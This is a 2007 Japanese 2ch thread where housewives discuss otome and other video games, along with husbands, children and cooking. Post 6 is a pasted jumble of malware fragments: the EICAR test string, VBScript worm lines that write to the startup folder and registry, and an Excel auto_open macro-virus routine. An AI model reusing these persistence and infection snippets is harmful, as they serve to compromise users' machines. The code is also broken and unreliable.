2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

主婦のゲーム生活3weeks.

1 :名無しって呼んでいいか?:2007/08/19(日) 09:10:03 ID:???
ゲーム好き主婦カモォォォンщ(゚∀゚щ)

980踏んだ人次スレよろしく

前スレ

主婦のゲーム生活2weeks.
http://game12.2ch.net/test/read.cgi/ggirl/1150962691/


2 :名無しって呼んでいいか?:2007/08/19(日) 10:49:09 ID:???
よっしゃ2ゲットォォォォォォ!!!


>>1乙です。

3 :名無しって呼んでいいか?:2007/08/19(日) 17:56:51 ID:???
>>1
乙華麗

ついでに3ゲット

4 :名無しって呼んでいいか?:2007/08/19(日) 18:48:55 ID:???
>>1
おつ

5 :名無しって呼んでいいか?:2007/08/19(日) 19:38:16 ID:???
>>1
いちおう過去スレ

主婦のゲーム生活
http://game9.2ch.net/test/read.cgi/ggirl/1088734459/

6 :名無しって呼んでいいか?:2007/08/19(日) 19:57:40 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


7 :名無しって呼んでいいか?:2007/08/19(日) 21:07:31 ID:???
>>1奥乙ですわ!

8 :名無しって呼んでいいか?:2007/08/21(火) 21:58:41 ID:???
前スレDAT落ちしちゃったようですな。

9 :名無しって呼んでいいか?:2007/08/25(土) 10:21:40 ID:HpyJhKhG
554 名前:名無しって呼んでいいか?[sage] 投稿日:2007/06/11(月) 21:02:38 ID:???
二次元→年下で頼りない感じの可愛いの

三次元→自分より30歳は年上の紳士的なひと。結婚してると尚良い
それか子供好きなひと

555 名前:名無しって呼んでいいか?[sage] 投稿日:2007/06/11(月) 23:40:32 ID:???
>>554
えーと不倫したいってこと?

556 名前:名無しって呼んでいいか?[sage] 投稿日:2007/06/12(火) 19:06:03 ID:???
>>555
ううん。若さを武器にして略奪したいってこと
だっていい年して結婚してない男なんかロクなやつ居ないし

557 名前:名無しって呼んでいいか?[sage] 投稿日:2007/06/15(金) 11:16:49 ID:???
妻や子がいるのに娘くらいの子に惚れるようなエロ爺はいやじゃないんだ?w

558 名前:名無しって呼んでいいか?[sage] 投稿日:2007/06/16(土) 01:19:59 ID:???
>>557
全然おk
大半の男は永遠に若くて可愛い女が好きなんだから、迫られたら娘くらいの子に惚れたっておかしくない
所詮男は皆エロだしww

マジレスゴメソ

10 :名無しって呼んでいいか?:2007/08/27(月) 11:56:33 ID:???
コルダ楽しみすぎる。
コルダの影響でピアノを再開してしまった。
更に志水の影響で、楽譜を丁寧に見て練習する癖がついた。まりがとう志水。

しかし、乙女ゲも発展したね。『結婚』とかの時代があったとは…
ギャルゲも進化しているのかな。ときメモ・サクラ大戦・悠久くらいしかやったことないんだけど。
奥様がたは、ギャルゲもやりますか?

11 :名無しって呼んでいいか?:2007/08/27(月) 12:28:39 ID:???
>>10
ギャルゲはやったことないですな
SFC版の案ジェで乙女ゲデブーしてかれこれ…かれこれ……
数えるとなんだか鬱になりそうなのでやめておくが
それから今まで乙女ばっかりだ
あとはジュヴナイルとか零シリーズとかだな
他の姐さん方はどう?

あとここに来てる姐さんで、白銀買う予定の人いる?
雑誌見てうっかり坊主に萌えてしまった…



12 :名無しって呼んでいいか?:2007/08/27(月) 14:05:02 ID:???
>>11
SFCアンジェデブー同じですwロードがないから快適ではあったが…

私は先に書いたコルダと、パレドゥ、アラロスを予定しているだけです。
他のゲームに関しては、なるべく知らないようにしてます。欲しくなったらきりがないorz

売るのも恥ずかしいから、溜まる一方だし…

13 :名無しって呼んでいいか?:2007/08/27(月) 17:05:56 ID:???
ギャルゲはしないというか、あまり手を広げても積みゲが増えるだけなので
積極的に買うのは乙女(全年齢&大人向け少々)と決めている。

あとは時々RPG、歴ゲーです。

秋は来週息子、コルダアンコとアラロスで手一杯。
猛将伝も並行してやらないとだしさ。

音楽好きなので、今やっているトラスティベルが面白いです。ショパンさんw
かっこいいし、意外に声優陣豪華。譲治のキャラにも萌えた。

14 :名無しって呼んでいいか?:2007/08/28(火) 14:54:58 ID:???
ギャルゲも好きで今はPSPのサクラやってる
夏休みだから家族の手前あんまり大っぴらにゲームできないけど
携帯機なら空いた時間にちょっとずつできるからいいね
しかしボルシチ作るミニゲームで人参がうまく切れない…
ゲームですら料理下手なんてorz

今の所予約してるのは中の人目当ての息子だけ
コルダアンコールは2が終わってからにしようかと

恋愛要素ありの一般ゲーが好きで
九龍・ジルオール・ガンパレ・ガンオケを繰り返し何度もプレイしてます



15 :名無しって呼んでいいか?:2007/08/30(木) 13:11:42 ID:???
>>11
坊主っていうか一重目の男があんな中央に堂々といるのが気になった。
一重切れ長目が好きなんだよ〜
坊主はちゃんと書いてくれないとただただ変な頭になるから
スチルの出来が心配だよ。

16 :名無しって呼んでいいか?:2007/09/02(日) 20:05:04 ID:???
今更ながらコルダ無印やってる。
最初は戸惑い乙ゲーの感じがしなかったが、徐々にはまり中。
2はおもしろいかな?アンチなども読んだけど、買ってみるか思案中。

17 :名無しって呼んでいいか?:2007/09/02(日) 20:24:11 ID:???
>>16
無印の方がいいって人も多いけど自分は2のが面白かったかな〜
今月2アンコールも出るし1が楽しめてるならいいんじゃない

18 :名無しって呼んでいいか?:2007/09/03(月) 02:40:34 ID:???
>>16
私は1も2もどっちも好き
1と比べると2の方が若干難易度が低いと感じた
練習の仕方とかも少し変化してるし会話イベントも充実してるから
飽きずに楽しめるんじゃないかと思うよ
ただし最萌えが王崎か金澤だとスチル枚数少なくて物足りなく感じるかも

ディアマイサンもうすぐだね
自分はアンコール優先してムスコはレポ待ちだけど
ここの姐さん方は結構買う人多いのかな?



19 :名無しって呼んでいいか?:2007/09/03(月) 08:35:01 ID:???
私は1のほうが好きだけど、2も待ち望んでいたので、ものすごい勢いで
やりまくったよ。
1はとにかく燃える。コンクール総合1位で股がけ5人とかw

2の金やんの扱いとEDにはorzだったけど、難易度も下がって間口が広くなって
肥的には良かったとオモ。

あさって息子だね。私は買います。
一応買うけど、アンコが届いたらアンコ優先。

20 :名無しって呼んでいいか?:2007/09/03(月) 10:38:32 ID:???
16です。
>>17=19トンです。
なるほど。買ってみます。板違いですが、後押しされました。火原に最萌え…というか中の人が好きなので買います。
一月に一つの約束をさせられてるので、今年はコルダ2→アンコ→放課後は(ryかな。
息子は現実に息子がいるので、どうしようかと…レポ待ちかな…

21 :名無しって呼んでいいか?:2007/09/03(月) 11:51:12 ID:???
自分も息子はレポ待ち
中の人に好きな人が数人いるのでかなりそそられるが…
リアルに息子いるし、何よりアンコには勝てないんだぜ
後、PSP同胞版のRPG買うので何より出費が…orz

22 :名無しって呼んでいいか?:2007/09/03(月) 12:24:29 ID:???
リアル息子いるけどムスコは買う
子育てに夢をみたいのかもしれないorz

23 :名無しって呼んでいいか?:2007/09/03(月) 17:13:57 ID:???
>>22
うちも買う
リアル子育て大変だけどゲームでどんなんかも気になるよ

24 :名無しって呼んでいいか?:2007/09/03(月) 18:50:39 ID:???
5日に買いに行ってそのまま家に戻ってすぐやってみたい>息子 のだけど、
学校に行かねばならないorz

オトンEDは全員クリアしないと無理なんだろうか。でもいろんな職業もあるうえに
恋愛EDもって、ものすごく時間かかりそうだ。アンコールまでにどうにか目処を
つけたいけど無理そうだね。アラロスも予約してあるし。
ここでもレポ出来るようにがんばるよ。

25 :名無しって呼んでいいか?:2007/09/03(月) 19:43:52 ID:???
>>24
PTA関係?>学校行かなきゃ〜

うちは小梨だけど、小有の姐さんたちは
そういう子供関連の付き合いとかもあるから大変だよな…

息子は確かED100種類以上あるんだっけ
双子×3パターンの息子、更にその子が選ぶ職業の違いがあり
協力者との恋愛EDもあり?でものすごいやりこめそうだ
レポ楽しみにしてるけど無理はしないでね
何事も健康第一だから  つ旦~

26 :名無しって呼んでいいか?:2007/09/03(月) 23:07:59 ID:???
自分も小梨だから子育てゲーってのにチョト興味ある。
まぁそりゃ実際の子育てとは全然違うんだろうけどw
まさかと思うけどグレちゃったりとかそういうBADENDはないよねー?
積みゲーがまだまだあるので新作は今のところ様子見だけど評判よければ欲しいな。

27 :名無しって呼んでいいか?:2007/09/03(月) 23:13:31 ID:???
APの方行く予定だから、自分もムスコはレポ待ってる。

28 :名無しって呼んでいいか?:2007/09/05(水) 16:38:15 ID:???
アラロス予約してる人いる?
結局、延期なのかな?


29 :名無しって呼んでいいか?:2007/09/06(木) 11:22:11 ID:???
尼では10月発売になってたね、前は9月だったよね?

30 :名無しって呼んでいいか?:2007/09/06(木) 16:37:26 ID:???
アラロス、兄友で予約してるけど、延期なんだ?
台風直撃だから、これから息子受け取りに行こうか悩み中。

コルダ、なんかものすごいことになっていて、動悸がして大変だw

31 :名無しって呼んでいいか?:2007/09/06(木) 20:50:56 ID:???
えっ?アラロス延期なの?初めて知ったぞ!
楽しみにしてたのに〜

ウィルは様子見、ムスコはリア息子がいるので
全くといっていいほど興味ナッシングwレポだけ
楽しませてもらおうと思う。

32 :名無しって呼んでいいか?:2007/09/06(木) 20:51:10 ID:???
ムスコ気になってたけど本スレの流れがぼみょんで買う気失せたよ…
まさかと思うけどあんな厨臭いのが本当に主婦でも一緒にしてくれるなって感じなんだけど。
2chじゃなんでもチュプひと括りだもんなー

33 :名無しって呼んでいいか?:2007/09/06(木) 23:16:24 ID:???
本スレの流れ云々に関しては気持ちはわかる…>ムスコ
だから自分はここの主婦仲間のレポ待ち

コルダまであと二週間だね
のんびり積みゲ崩しして待つか

34 :名無しって呼んでいいか?:2007/09/06(木) 23:58:50 ID:???
ムスコ今やってる
息子はかわいいんだけど本スレやネタばれスレで言われてるほど
自分は萌えない
やはりリア息子がいるせいだろうか
女子高生や女子大生が赤ちゃんや幼児見てやたら「かわいい〜」と
いう感覚なんだと思う
まだ一周目終わってないし息子もまだ小学生だから面白いのは
これから・・・と思いたい

35 :名無しって呼んでいいか?:2007/09/07(金) 04:13:58 ID:???
自分もムスコは様子見(リア息子あり)なんだが…
>>34の気持ちがプレイもしてないのにちょっと解ってしまった
リアで子供がいるとどうしても違う気持ちになってしまいそう。

36 :名無しって呼んでいいか?:2007/09/07(金) 09:41:28 ID:???
まだEDいってないが今んとこ普通に育成ゲームとして面白いと思う
ムスコたち可愛いし私は満足だ

しかし「こんな○歳児見たことねーよwwwww」とは思ったw
あと旦那が無責任すぎて主人公目を覚ませと

37 :名無しって呼んでいいか?:2007/09/07(金) 15:18:15 ID:???
やっと高校生になった
育成パートは面白い
育成ばっかりやりたい気分だ
自分はパラ上げゲームが好きなんだと実感したよ

でも話はけっこう面白い
ところどころで画面にツッコミ入れたり笑ったりできる
高校生になると、主人公が子離れして息子絡みが少なくなったり
けっこうリアルw



38 :名無しって呼んでいいか?:2007/09/07(金) 23:13:49 ID:???
自分もプレイ中
六時間以上プレイしたけど10歳、まだ半分プロデュース部分が残ってるから結構ボリュームありそう
ストーリーはリア息子いるからなんつうか…面白みが無いってか予想できる展開ばかり…
他攻略?キャラや大きくなってからのイベントが面白いといいんだけど、自分はこの先どう楽しくなるかで評価が変わるかな
育成部分面白いけどADV長いな、もっと沢山育成出来ればと思う

39 :名無しって呼んでいいか?:2007/09/08(土) 06:46:49 ID:???
昨日の夜やっと1周終わった
神EDだったよ
ADV部分は雷斗と風斗の2種類しかないっぽい?
セーブデータ利用してムスコの性格変えてみたけど
声がかわっただけで、シナリオはまったく同じだった
性格イベントが違うだけで
だからスキップしまくり
最初真面目キャラでやったから、熱血キャラはほとんど聞いてない
う一人のムスコEDを見たらあとは育成でEDコンプを目指すだけの
ゲームになるのかな
それはそれでなんだかな・・・という印象
でも育成楽しいから自分には好都合

40 :名無しって呼んでいいか?:2007/09/08(土) 20:37:23 ID:???
息子、やっと買ってきましたよ。

まだ年長さんなんだけど、リア息子がいるからなかなか懐かしかったり
オトンと親友の中の人好きなので出てくると楽しいのだけど、これから成
長するにつれてどうなるかなあ。

なんか(自分自身の)母の立場のほうが強すぎて、恋愛までいけるかわからない。
実際、やっていて行儀と学力(というか賢さ)に力を入れてしまうw

ま、ちょっと思うがまま育ててみるよ。
今ひとつわかりにくいので、これがどうなっていくのか心配。

風斗の好き嫌いの話は、実際リア息子で体験済みなので、ガツーンときたわww

41 :名無しって呼んでいいか?:2007/09/09(日) 00:06:02 ID:???
ムスコレポして下さった姐さん方dです!

皆の話からするとなかなか面白そうなので
余裕が出来た時にポチることにするよ
小梨なのでいつか子供が出来た時の予行てコトでw

42 :名無しって呼んでいいか?:2007/09/09(日) 03:36:53 ID:???
ムスコやっと1人クリアしたけど
「産んでくれてありがとう、育ててくれてありがとう」って言われて
実際の息子にもいつかそんな事を言ってもらえる
育児が出来てるだろうかとちょっと感慨にふけってしまった

パラ調整が細かくて難しいけどゲーム自体は面白いと思う
攻略本が欲しいよ

43 :名無しって呼んでいいか?:2007/09/10(月) 05:37:53 ID:???
携帯で無料でゲームやサークルができて友達できるよ
アバターやデコメもあるし楽しいからおすすめだよ
http://mbga.jp/AFmbb.UdcAc9998/


44 :名無しって呼んでいいか?:2007/09/13(木) 10:22:13 ID:???
保守

コルダのツインパックを尼でポチッしてきた私が通りますよ。
なんか、お得な気がして…そうでもないのかなぁ。

45 :名無しって呼んでいいか?:2007/09/14(金) 22:54:58 ID:???
ツインパック…どうだろう。
自分もコルダ2はまだ買ってないので一瞬考えた。

ただ、やる暇と金がないからベストを待とうと今から思う自分が居るw


46 :名無しって呼んでいいか?:2007/09/15(土) 17:53:49 ID:???
ネオロマは常に公式予約で終わっても売らないので
ツインパックって買ったことない……
でもコルダ2は前作無印よりも難易度が下がって
システムも更に快適になってたのでオススメするよ〜楽しんで下さい>>44


そのアンコール、ゲムシチから早々に発送メールが来た!
よっしゃ篭もるぞ!とウキウキしてたら旦那の遅い盆休みが発売日に被ったorz
ここんとこ構ってあげられなかったからどこでも連れてくよ!
久しぶりに鼠海とか行こうか?とかすごいニコニコウキウキしながら言ってるヤツに
家に篭もってコルダ三昧したいとはとても言えない……

いや鼠海行きは嬉しい、とっても嬉しいんだけど
ゴメン旦那、今私が一番会いたいのは
蝶ネクタイ鼠や水兵アヒルじゃなくて 土 浦 なんだ……

47 :名無しって呼んでいいか?:2007/09/15(土) 18:23:08 ID:???
44です。
>>45-46の姐さん、トンです。
無印を廉価の中古でやったので、このままのテンションでイッキにいっとこうかと…
46さんは発送メール来たんですか?自分は金振込めメールもまだだorz


48 :名無しって呼んでいいか?:2007/09/15(土) 18:55:37 ID:???
>46
ごめん、気持ちわかったけど、ワラタ。
私も鼠よりはコルダメンバー・・・つきあった状態での柚木に会いたいです。
金やんは、引き継ぎなしらしいしorz

うちも発送メール来てる>公式
多分前日には届くと思う。
水曜は徹夜でやって、木曜はパートに行くよ。>教育関係なので、きっちり表の顔w

そして、金曜はゲーショー@プレスデー行って参ります。
一般の日、息子育成イベありそうだし、気合いが入れば行くかな。

49 :名無しって呼んでいいか?:2007/09/17(月) 19:27:38 ID:???
みんなアンコール待ちですか
私は最近無印を終え、2プレミアムを入手し、明日から火原と爽やかな学園生活を送る予定だったが
今日イキナリ入院した義父を毎日お見舞いすることに/(^O^)\

50 :名無しって呼んでいいか?:2007/09/18(火) 21:55:07 ID:???
チラ裏。

この連休中、横浜観光などしていたのだが、
三渓園に行ったらそこの建物の中に
ぱーんとコルダのポスターが貼ってあって目が点に。
隠れ乙女ゲーマーなんで、「あら何かしら」みたいなそしらぬ顔で
読んでみると、スタンプラリーなんてやってるんだね。
柚木のスタンプ置いてあったわ。


51 :名無しって呼んでいいか?:2007/09/19(水) 12:35:19 ID:???
>>46のレスを見て「あるあるwww」って笑ってたのに……orz
いや、毎日一生懸命働いてくれてるし休日出勤も多いからたまには平日に休み取ってもいいとは思うんだ
だけど明日はコルダアンコの日なんだよ……
明日は篭る気満々だったのに……
旦那は好きだが時々ムカつくorz

52 :名無しって呼んでいいか?:2007/09/19(水) 13:03:58 ID:???
自分も土日が結構嫌だったりするな、旦那が構って欲しがるから。
これで息子が大きくなったら余計にそう思うんだろうな…

今日中にアンコ、フラゲ出来そうなのに
プリンセスナイトメアを今更始めてみた。これ結構面白いよ。
ここじゃ余り話題に上ってないみたいだけど。PCゲだからかな?

53 :名無しって呼んでいいか?:2007/09/19(水) 15:06:10 ID:???
おお、このスレにもプリナイ仲間がw
発売日買いして自分的にすごい面白かったんだけど
かなりさっくり終わってしまうもんだから、何となくここでの話題にしそびれた感じ。

54 :名無しって呼んでいいか?:2007/09/19(水) 15:24:19 ID:???
プリンセスナイトメア気になってるけどPCゲってこともあるし
ボリュームが少ないって聞いて足踏み状態

明日はコルダアンコの日!
コルダ2から乙女ゲにどっぷりはまってからいろんなものに
手出したけどやっぱりコルダが一番好きだ

55 :名無しって呼んでいいか?:2007/09/19(水) 17:20:49 ID:???
不在連絡が入っていたので、もうすぐ届く。
とりあえず今日中に最萌え落とすと決めた。決めたぞ。

データ引き継いだら気が狂うほど甘かったらどうしよう。もうそれだけで
胸がいっぱいだw



56 :名無しって呼んでいいか?:2007/09/19(水) 23:47:48 ID:???
コルダアンコ、一周終わった。

イイヨイイヨ。
でもこれでこのメンバーとはお別れなんだと思ったら悲しくなった。

しっかし、女の子(天羽、冬海ちゃん)がらみもいつも良い感じで。
ほんといいゲームだなあと思いました。

57 :名無しって呼んでいいか?:2007/09/20(木) 06:19:29 ID:???
>>53
おお!プリナイ人いたww
自分未だ全然途中なんだが、凄いテンポ良くて面白いし
かなり萌えもあるし今の所お気に入りだ
ボリュームは薄いのか…ちょっとショックだがコンプ頑張れそう

>>54
自分はPCゲーだからこそやり易そうで購入したんだが
ボリュームは解らないんだが、萌えはかなりあると思うよw
かなりニヤニヤするw
後、作りが丁寧。テンポも良いから自分的には良ゲーだ

58 :名無しって呼んでいいか?:2007/09/20(木) 08:46:52 ID:???
ヲヲヲ、配達中になってるアンコーーー明日だと思ってた、尼だからw
夕飯(カレー)の買い物行きたい。早くスーパー開いてえ。
しかし、うちも明日旦那休みorz「どこか連れて行ってあげるねニコニコ」て…
うんありがとう、でも明日はどこも行きたくないんだ…
柚木の為に掃除洗濯しちゃおっーと!wktkwktk

59 :名無しって呼んでいいか?:2007/09/20(木) 11:11:22 ID:???
アンコ買ってきたーーーー
ついでに買い物も行ってきた
旦那はタイミングのいいことに今日は泊まりで歓送迎会
今から最萌え特攻行ってくるノシ

60 :名無しって呼んでいいか?:2007/09/20(木) 22:41:01 ID:???
プリナイやった姐さん方に質問なんだけど
犬飼ってどう?甘い?
最近小野にありえないくらいハマッてしまって
プリナイ買うかどうか迷ってるんだ……

61 :名無しって呼んでいいか?:2007/09/21(金) 07:43:41 ID:???
>>60
基本的にプリナイはハーレムゲーなのでニヤニヤはすると思う


小野はキャラによって声質全然違うし
どんな小野の声が好きかによって萌え度はかなり違うかと…
と言うのもプリナイの小野は完全に筋肉わんこ系で暑苦しいので。可愛いんだけどね。
サンプルボイスがいけるんならお奨め出来るかな

62 :名無しって呼んでいいか?:2007/09/21(金) 08:58:16 ID:???
小野出過ぎ感があるんだが、しかし私も好きな声です。
ネオアンのヒュウガ以来ついチェックしてしまう。

コルダアンコに燃えすぎて、この暑いのに食事メニューが思いつかない。
(萌えもあるけど高評価とか課題達成に力が入りすぎ)

今日、鍋にするかなという勢いだ。・・・鍋、カレー、シチュー、ポトフ等、
もうそんなのでいいや。



63 :名無しって呼んでいいか?:2007/09/21(金) 09:46:29 ID:???
昨日アンコのおかげでカレーだったw

64 :名無しって呼んでいいか?:2007/09/21(金) 13:24:19 ID:???
コルダアンコ、ようやく手元に。夜に向けて、これから昼寝する。はぁぁ、待ってろよ、火原!

65 :60:2007/09/21(金) 15:47:39 ID:???
>>61
レスアリガd!
小野ボイスなら漏れなく何でも萌えられるので大丈夫だとオモ
一応サンプルボイス聞いてみるよ
キャラソンは聞いたけどボイスはまだだったんで
それでも問題なければコルダアンコ一段落したらポチってくる!

>>62
私は星の降る刻の有馬からかな…
でも前は好きは好きでもここまでじゃなかったのに
何でか最近いきなり萌え度が激しく上昇したww

66 :名無しって呼んでいいか?:2007/09/22(土) 21:18:30 ID:???
コルダアンコールしっかりはまった
でも連休は旦那がいるから一切ゲームできないんだよな……
3連休なんていらねぇよ!
私に加地を落とさせてくれよ……



67 :名無しって呼んでいいか?:2007/09/22(土) 21:37:33 ID:???
コルダアンコールしっかりはまった
でも連休は旦那がいるから一切ゲームできないんだよな……
3連休なんていらねぇよ!
私に加地を落とさせてくれよ……



68 :名無しって呼んでいいか?:2007/09/22(土) 23:01:02 ID:???
>>66
モチツケ。

コルダは2からやってないので、ここの流れを見てて
そのうちやりたいなーと思ってる。

だが、なぜか突然ネオ案が気になってしょうがない。
激しく甘いとか聞いたのだが、どうなんだろうな…。
(自分はSFC案からやってるんだが)

69 :名無しって呼んでいいか?:2007/09/23(日) 02:11:55 ID:???
コルダアンコ思ってたより難しいね。
発売日に、旦那帰るまでに終わらせようとして、説明書さえ見ずに余裕で4股でやってみたら全滅w
二周目はやさしいでプレイしたら六股できたけど、旦那帰ってきたから、結局まだエンディング見れてない><

70 :名無しって呼んでいいか?:2007/09/23(日) 08:38:03 ID:???
アンコ、難しいというか期間短いんだよね。だから曲の仕上がりが今ひとつに
なってしまう。
普通モードだと、2股か3股が精一杯。
とりあえず全部のEDは見て、コルダで家事放棄気味のなか床だけ掃除したw

難しいモードでのオケ達成が待っている訳ですが、出来るかどうか自信ない。


>68
ネオアン、発売当初にやりまくったけど、あのシステムは快適だった。(今の
コルダもそのシステム流用)
甘いと思うよ。
個人的には、ヒュウガが好きだけど、甘さはジェイドがすごいうえに、ニクス
のEDには驚いたw

71 :名無しって呼んでいいか?:2007/09/23(日) 14:32:32 ID:???
>>68
70同様、ネオアンは発売当初プレイしまくった
システムは快適で旧案よりやりこみ要素が高いし
キャラクターもみんな今までにいなかったタイプで面白かった
初見はレイン好きだったんだが実際プレイしたら
ヒュウガが最萌えになった・・・あの告白シーンは素晴らしい

もうベスト版出てるから安く手に入るよ


72 :名無しって呼んでいいか?:2007/09/23(日) 20:46:14 ID:???
エトワールで「もうついていけない…」と思ったにも関わらず
ネオで激しく萌え倒した私が来ましたよ
それぞれについてシナリオが展開するので毎周楽しめた
最初pgrってた食事会もだんだん楽しくなった

コルダ2もアンコもネオアンもいいと思うよー>68
と儲丸出しな私w社員乙とか言われるのかなww

73 :名無しって呼んでいいか?:2007/09/23(日) 23:36:17 ID:???
今はアンコ始めたばっかだから無理だけど、ここ見てネオアンに興味持った。
アンジェシリーズは全くやったことないけど。
次買うかも。

74 :名無しって呼んでいいか?:2007/09/23(日) 23:51:37 ID:???
70ですが、ベスト版出ているから、やってみると良いと思う。

私はアンジェシリーズ全く未プレイだったので、あの世界観が
よくわからなかった部分もあるのだけれど、楽しめると思う。
確かにキャラは今までにいないタイプだったかも。

私もあの会社の儲と言われるかもしれないwが、遙かシリーズにしても
何にしても、商売がうまいなwww ・・・私は無双もやるし、もう社員乙という
感じだ。


75 :68:2007/09/24(月) 00:38:01 ID:???
ちょwここは後押しするスレだったか?!www

姐さん方の思惑にはまり、コルダ2ツインパック買っちゃったよ…orz
だが後悔はしていない。
ネオアンにもそのうち手を出すよ!
勧めてくれた方々ありがd!


76 :名無しって呼んでいいか?:2007/09/24(月) 08:29:12 ID:???
自分は今コルダアンコやってるけど、今までの流れで
ネオアンやってみたくなったぞwww
前から気になってたのもあったけど姐さん方の後押しがw
アンコが一段落したら…と思ったけどその前にアラロス…

77 :名無しって呼んでいいか?:2007/09/24(月) 09:34:00 ID:???
いま76がいいことを言った!
コルダアンコで忘れていたけど、アラロス私も予約済だったわw

コルダツインパック買った75よ。2でED見た後、そのままアンコでデータを
引き継いでそのまま同じ人に特攻するとなかなか楽しさ倍増。慣れたら
やってみれ。



78 :名無しって呼んでいいか?:2007/09/24(月) 10:00:00 ID:???
>いい事を言った!
使い方間違ってない?

79 :名無しって呼んでいいか?:2007/09/24(月) 10:01:00 ID:???
ネオ案、ま さ やのせいで買えなかった自分が通りますよw
別に嫌いじゃないけど吹いてしまいそうなので。

80 :名無しって呼んでいいか?:2007/09/24(月) 10:39:20 ID:???
まさやはねぇ・・・。
正直まさやを起用したときは驚いたし、そのおかげでジェイドは今ひとつ
だったのだが、ゲーム自体はおすすめ汁。

81 :名無しって呼んでいいか?:2007/09/27(木) 16:58:41 ID:???
汁の使い方違わね?

82 :名無しって呼んでいいか?:2007/09/30(日) 19:54:13 ID:???
アンコ終わったらネオアン買ってみる

83 :名無しって呼んでいいか?:2007/09/30(日) 20:00:55 ID:???
自分もネオ案プレイしたくなってきたw遙か3シリーズ終わったら買おっと。

84 :名無しって呼んでいいか?:2007/09/30(日) 20:21:12 ID:???
ネオ案楽しめるといいね。
自分は花柳剣士伝待ち。
この秋の新作乙女ゲーはこれ一本に絞っているから
待ち遠しくてたまらないw

85 :名無しって呼んでいいか?:2007/10/01(月) 01:17:40 ID:???
感想ヨロです。
新規開拓したいけど、ついシリーズもの購入してしまうよ…。

86 :名無しって呼んでいいか?:2007/10/01(月) 05:44:15 ID:???
暫く買おう!!って激しく燃え滾るゲームが無くてションボリ
1月のラスエス新作待ちかなあ
秋の新作はここのスレの評判見て決めようかと…
皆は何買う予定?

87 :名無しって呼んでいいか?:2007/10/01(月) 12:27:53 ID:???
とりあえず、今週のアラロス待ち。

コルダアンコはほとんどフルコンプしました。あと数名の数枚想い出の写真が
開かないだけなので、アラロスを引き取りに行くまでにはどうにかなると思う。

ここ見て、久々ネオアンやりたくなってきたよ。食事会で目配せしてくるかw

88 :名無しって呼んでいいか?:2007/10/01(月) 12:44:40 ID:???
自分は恋華待ち
フラゲが出来るんで初めて店頭予約してしまった

コンダアンコールを全てコンプしたのでとりあえずこの2、3日はまじめに生活するつもりw
あとはアラビアンズロストが気になってるけどこれはレポ待ちかなぁ

89 :名無しって呼んでいいか?:2007/10/02(火) 23:16:01 ID:???
みんな攻略早いなー
アンコ発売日に買ったのに、まだ通常EDを一通り見ただけだよ
子供いないのに最近あんまり時間がない…

90 :名無しって呼んでいいか?:2007/10/03(水) 00:13:44 ID:???
アラロスは来週じゃない?
恋華もアラロスも待ってるけど、恋華は前回のメモリー必要なの?
もう1回やるのか…。

91 :名無しって呼んでいいか?:2007/10/03(水) 03:08:59 ID:???
ウィルオウィスプやった人いる?
迷ってるんだよねえ…

92 :名無しって呼んでいいか?:2007/10/03(水) 07:09:50 ID:???
アラロス4日じゃないのか?
公式見てくるよ〜!

93 :名無しって呼んでいいか?:2007/10/03(水) 07:43:13 ID:???
>>90
恋華は前回クリアデータがあれば、前回攻略キャラと鈴花の
カップリング設定ができるらしい
あるのとないのとで花柳の攻略は変わるんだろうか…

自分もアラロス待ち
公式も11日発売になってたね
あと1週間…コルダアンコのやり込みして待ちます

94 :名無しって呼んでいいか?:2007/10/03(水) 08:18:47 ID:???
恋華のクリアデータはイベントや会話が追加されるくらいで、
攻略自体は変わらないんじゃないかなー。水の旋律2みたいな感じで。
もし攻略まで変わったら、自分の中では神ゲーだよ。

95 :名無しって呼んでいいか?:2007/10/03(水) 09:59:14 ID:???
アラロス待ちがここにもいます。

来週になってるということは、コルダアンコのやりこみと久々にPSP
コルダか無印コルダやって待つことにします。

鍋1つで出来るおかずループも飽きてきたところに、肌寒くなって参りましてw
おでんや鍋物のシーズンになってきて嬉しい限りでございます。


96 :名無しって呼んでいいか?:2007/10/03(水) 14:29:16 ID:???
アラロス待ちの人多そうだね。
レポ待ちなので、感想を投下してもらえると嬉しいです。
自分は恋華組なので、明日からしばらくカレーと鍋が中心になりそう。
鍋はヘルシーだし2日目のカレーは美味しいし、いい季節になってきたねw

97 :名無しって呼んでいいか?:2007/10/03(水) 17:51:54 ID:???
自分は恋華のレポ待ってる
新撰組はシナリオとかはものすごく好きだったんだけど
攻略対象の数が多いのにストーリーの前半共通部分多くて、
でも親密度の関係で他キャラ落とすときには初期のセーブデータ
使わなくちゃいけなくて何度も何度も同じ話見てたら途中で飽きちゃった
まだ落としてないキャラ何人かいる…
今やったら久しぶりだしコンプできるかな




98 :名無しって呼んでいいか?:2007/10/07(日) 09:46:47 ID:???
恋華、よさそうじゃないか?(EDを見たらageスレ見てるけど)
アラロスが来るとなると、息子が完全に積みゲーになる予感orz

今鬱モードで、久々薬の世話になってるから悲恋は無理ぽ。



99 :名無しって呼んでいいか?:2007/10/07(日) 10:20:09 ID:???
>>98
恋華よかったよ。恋愛は薄いけれど丁寧に作ってある印象。
今作キャラによっては悲恋だから、切なくて悲しくなるけど。
昨夜も泣いたし、今朝もまだ引きずってるw

どうぞお大事にね。

100 :名無しって呼んでいいか?:2007/10/07(日) 10:21:03 ID:???
ごめん訂正(´・ω・`)
今作→今作も

101 :名無しって呼んでいいか?:2007/10/07(日) 17:08:48 ID:???
